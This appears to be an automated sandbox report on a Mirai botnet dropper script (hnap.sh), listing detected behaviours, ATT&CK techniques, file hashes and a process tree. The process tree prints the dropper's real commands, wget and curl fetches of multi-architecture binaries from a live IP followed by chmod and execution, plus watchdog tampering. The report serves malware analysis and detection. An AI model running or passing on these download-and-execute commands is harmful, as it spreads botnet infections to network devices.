mirai | b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e

Analysis

max time kernel
19s
max time network
30s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11-12-2024 21:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hnap.sh
Size

2KB
MD5

0414924f3d84871e5135cdc7433372ff
SHA1

e1a734139811fea57eae3589f8442ae29b9de623
SHA256

b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e
SHA512

a9da40d314c1cfe932787b37785473bcff0dff63983ef3a86682951d30cdd2ae98bc0219ec26a06d70b816aedb3983ca713d0500f3f36967c408a50e23b76916

Score

10^/10

mirai botnet antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (770) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 8 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
799	chmod
807	chmod
683	chmod
716	chmod
745	chmod
757	chmod
787	chmod
793	chmod

Executes dropped EXE 8 IoCs

ioc	pid	Process
/tmp/Andrew	684	Andrew
/tmp/Andrew	717	Andrew
/tmp/Andrew	746	Andrew
/tmp/Andrew	758	Andrew
/tmp/Andrew	788	Andrew
/tmp/Andrew	794	Andrew
/tmp/Andrew	800	Andrew
/tmp/Andrew	808	Andrew

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Andrew
File opened for modification	/dev/misc/watchdog	Andrew
File opened for modification	/dev/watchdog	Andrew
File opened for modification	/dev/misc/watchdog	Andrew

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-3.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-9.dat	upx
behavioral2/files/fstream-12.dat	upx
behavioral2/files/fstream-15.dat	upx
behavioral2/files/fstream-17.dat	upx
behavioral2/files/fstream-18.dat	upx
behavioral2/files/fstream-20.dat	upx

Changes its process name 2 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	/var/Sofia	800	Andrew
Changes the process name, possibly in an attempt to hide itself	/var/Sofia	808	Andrew

Checks CPU configuration 1 TTPs 8 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 19 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	Andrew
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/exe	Andrew
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/	Andrew

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
760	wget
785	curl
786	cat

Writes file to tmp directory 16 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mips	curl
File opened for modification	/tmp/arm4	curl
File opened for modification	/tmp/arm5	wget
File opened for modification	/tmp/arm5	curl
File opened for modification	/tmp/x86	curl
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/mpsl	wget
File opened for modification	/tmp/mpsl	curl
File opened for modification	/tmp/arm4	wget
File opened for modification	/tmp/i486	curl
File opened for modification	/tmp/Andrew	hnap.sh
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/i686	curl
File opened for modification	/tmp/x86_64	wget
File opened for modification	/tmp/x86_64	curl
File opened for modification	/tmp/mips	wget

/tmp/hnap.sh
/tmp/hnap.sh
1⤵
- Writes file to tmp directory
PID:656
- /usr/bin/wget
  wget http://37.114.41.90/bins/i486
  2⤵
  PID:659
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/i486
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:672
- /bin/cat
  cat i486
  2⤵
  PID:681
- /bin/chmod
  chmod +x Andrew hnap.sh i486 systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH
  2⤵
  - File and Directory Permissions Modification
  PID:683
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  PID:684
- /usr/bin/wget
  wget http://37.114.41.90/bins/x86
  2⤵
  - Writes file to tmp directory
  PID:685
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:691
- /bin/cat
  cat x86
  2⤵
  PID:714
- /bin/chmod
  chmod +x Andrew hnap.sh i486 systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH x86
  2⤵
  - File and Directory Permissions Modification
  PID:716
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  PID:717
- /usr/bin/wget
  wget http://37.114.41.90/bins/i686
  2⤵
  - Writes file to tmp directory
  PID:721
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/cat
  cat i686
  2⤵
  PID:744
- /bin/chmod
  chmod +x Andrew hnap.sh i486 i686 systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH x86
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  PID:746
- /usr/bin/wget
  wget http://37.114.41.90/bins/x86_64
  2⤵
  - Writes file to tmp directory
  PID:748
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:749
- /bin/cat
  cat x86_64
  2⤵
  PID:755
- /bin/chmod
  chmod +x Andrew hnap.sh i486 i686 systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  PID:758
- /usr/bin/wget
  wget http://37.114.41.90/bins/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:760
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:785
- /bin/cat
  cat mips
  2⤵
  - System Network Configuration Discovery
  PID:786
- /bin/chmod
  chmod +x Andrew hnap.sh i486 i686 mips systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:787
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  PID:788
- /usr/bin/wget
  wget http://37.114.41.90/bins/mpsl
  2⤵
  - Writes file to tmp directory
  PID:790
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:791
- /bin/cat
  cat mpsl
  2⤵
  PID:792
- /bin/chmod
  chmod +x Andrew hnap.sh i486 i686 mips mpsl systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  PID:794
- /usr/bin/wget
  wget http://37.114.41.90/bins/arm4
  2⤵
  - Writes file to tmp directory
  PID:796
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:797
- /bin/cat
  cat arm4
  2⤵
  PID:798
- /bin/chmod
  chmod +x Andrew arm4 hnap.sh i486 i686 mips mpsl systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Changes its process name
  - Reads runtime system information
  PID:800
- /usr/bin/wget
  wget http://37.114.41.90/bins/arm5
  2⤵
  - Writes file to tmp directory
  PID:802
- /usr/bin/curl
  curl -O http://37.114.41.90/bins/arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:803
- /bin/cat
  cat arm5
  2⤵
  PID:806
- /bin/chmod
  chmod +x Andrew arm4 arm5 hnap.sh i486 i686 mips mpsl systemd-private-a0742982d8fd4eedb4c5c606038f8148-systemd-timedated.service-2lv4jH x86 x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/Andrew
  ./Andrew hnap.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Changes its process name
  - Reads runtime system information
  PID:808
- /usr/bin/wget
  wget http://37.114.41.90/bins/arm6
  2⤵
  PID:810

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Andrew

Filesize
34KB

MD5
92fe040441ea0ea4f5b82b81af19e8e3

SHA1
ac238f731e93f7c90ce84ec7f8d5b39a10067bf3

SHA256
c301e34dd20b32b2aac1264119c7de0a24045956d3247e77415edd23bb809199

SHA512
aef272663f4ddf9d92585b2add265d72e560405ebad0271c4f39bd216d382a6dddc6336ce3be6bd22421dcd675a9956df2f815b83e53bea0869e9dfbcd3c9467

Download Submit
/tmp/arm4

Filesize
31KB

MD5
b09e32f241911f4ddac45a1a7a19ba49

SHA1
17a7f213570aaea7f66b9c38091c9485fa0ea510

SHA256
42828a483869a643cec73d181faff7f3a433c9570fc96a6bc63a2d8bc2b1f95c

SHA512
1d7e94f3076da3e47e902cc523bb752d5333fcbe86a8f35e6ef11202b80e6021318ff8d60843a410a849dd46296e45ed452bfe01ea722df6bdbdd565fd954da5

Download Submit
/tmp/arm5

Filesize
32KB

MD5
bf55d7061cedeb10e6a3839353dc6d8c

SHA1
34b773230a77570ef0c6fced5ab9f125996e4daf

SHA256
aae9d2a9669849b09b4e8ed8f3baeeb4c948ca80ebddd5004a57c2b6b7049fc9

SHA512
555f6dec792e49927d5392fc8dae5174e8868c9acdddebd4d0a5b3386352df40c7342a82d0973979cdb5061ee347f4ebd33ce19ab98fbb6dcae293e1eb69c57e

Download Submit
/tmp/i486

Filesize
274B

MD5
090e35476de39030dfeafbcf3d3e3f43

SHA1
a4bd408cec5d1185b478e528cf60a9f5186e0b87

SHA256
0085db6c6f0d1ba4e0ea26fcc04cd3afc69a900a9fd087079c4957364bf4dd1b

SHA512
55c266d1a3bb285ec821ecac894c2f5dbae7798c08e4f829db0e8c06f22084a919ef0fb17a1ddf4640228453bee8555fa6f69025c398292c5c8382e3c466a181

Download Submit
/tmp/i686

Filesize
28KB

MD5
15fb222600a3061f5c8e5ef04e5298a6

SHA1
93b4a17632479c8a45e2554a18ea61ea7365c532

SHA256
fff08f2a1a9c20d447ac5cacb89df1287bb830a2fc0cd5866d31d9f3ba653965

SHA512
11e390838b35bdacfa84ebdfc076f564abc1538bc972895b81d2156be52177bb25d62662871ae624747cca29e089a7a9a6ef205db4c694a2c106641d33942c34

Download Submit
/tmp/mips

Filesize
34KB

MD5
6088a204e0792a10d3724e836fe699b7

SHA1
fc1cf1010c99f155c46f94ec0529c8cea32c6055

SHA256
345984c9618d8bbf1c6e4a70ea62edd4666132f3787dbf07ad118d620cab8a2e

SHA512
bdf6dd68777d986f952a9d3aa5e505aaf360cda74d336c81f5ae1abebdebbdeb595f7bcdb26187f3c59fafbf545265b126435e3ead4346898f328e408bf8e48e

Download Submit
/tmp/mpsl

Filesize
34KB

MD5
b8f2bf3e7c002718f12751cb02130d2e

SHA1
06919c90eae2564ee9ded3f343e2ec18839e411d

SHA256
390f79cfca6cc7660d64c22208b4f2166807e5875da1a15336a9dccff130034d

SHA512
adfccc7878b168cba5b9f9ce92f246bced0e15db876c28ed2f7e0ec5e344ec6652b643045ca79937de7655da4c71b77db2c778f8b8d11b196bfff156a7d16185

Download Submit
/tmp/x86

Filesize
28KB

MD5
54d07ade0004f03aaca028523d8f3eb6

SHA1
73606fc68439ea7ceb148f94d61dbe0235da8355

SHA256
d1270e8be4de4713834930df984a515448ca8dd0acc7b0e03e5aa7fc4428882b

SHA512
43ce9c67151734e6e907a4bf30c06e41b52d524c388273380506b604ce3fed2779ef057b282737b1e05c11055611a4bd0559567253fb1b0f3309114e20eadf4b

Download Submit
/tmp/x86_64

Filesize
28KB

MD5
9cc970e0631afa61a049848f4f368b12

SHA1
54d7d99f436e9c97da5bfdd43698bb1dbd679b29

SHA256
681951c3fa70c2d14fe48e3c829f9f62f04f8fa9b430c0a87e849e397333dc16

SHA512
9f5bcd759af164b0e22479d44806dce6d3ca3e2b62fa3ac154b83111804cd1ee1df4b549fff0e8ab72d2a2d66dadb0f8f1cc301fee83a711e5c4055c2ee3567e

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads